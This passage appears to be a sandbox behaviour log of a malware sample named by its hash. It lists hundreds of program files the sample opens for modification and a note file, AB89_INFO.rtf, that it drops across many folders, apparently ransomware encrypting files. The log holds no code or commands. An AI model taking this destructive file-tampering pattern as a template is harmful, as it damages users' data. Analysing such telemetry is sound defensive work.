095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.p2.ui.overridden_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Windhoek 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Andorra 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\El_Salvador 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\pl.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Extensions\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\help.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Maldives 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Andorra 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Knox 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Asuncion 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Anadyr 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Caracas 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.rst 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\NewOut.midi 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Antigua 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Yellowknife 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Beirut 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\jamendo.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.LIC 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help_3.6.0.v20130326-1254.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\license.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Matamoros 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-charts.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson_Creek 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Bougainville 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.zh_CN_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\cursors.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Brunei 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-util-enumerations.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Athens 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Lord_Howe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\README.TXT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sa.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\images\cursors\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\jfluid-server_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\nb.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightRegular.ttf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_basestyle.css 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Explorer.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.attributeTransformation.exsd 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.di_1.4.0.v20140414-1837.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-progress.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyrun.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\New_York 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\contbig.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Detroit 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Dawson_Creek 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-nodes_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-sendopts.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Stanley 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\3RDPARTY 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Palmer 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Asia\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Efate 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hebron 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\NOTICE 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\MANIFEST.MF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.service.exsd 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Canary 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroBroker.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\Accessible.tlb 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jawt.h 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tijuana 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Manila 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm_export.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Update\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Vevay 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-search.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Amsterdam 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\IA32.api 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tongatapu 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kuching 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\PST8 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hong_Kong 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-13 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Curacao 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bogota 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\epl-v10.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\zh-CN.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.zh_CN_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\CST6CDT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\ssvagent.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Helsinki 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.c 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Sitka 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Thunder_Bay 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Brussels 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\XmlFile.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.commands_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kwajalein 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.rcp_4.3.100.v20141007-2301.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_globalstyle.css 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Mozilla Firefox\browser\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Broken_Hill 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\pingsender.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Jujuy 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_ko.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\meta-index 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\default-browser-agent.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\net.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\removed-files 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for 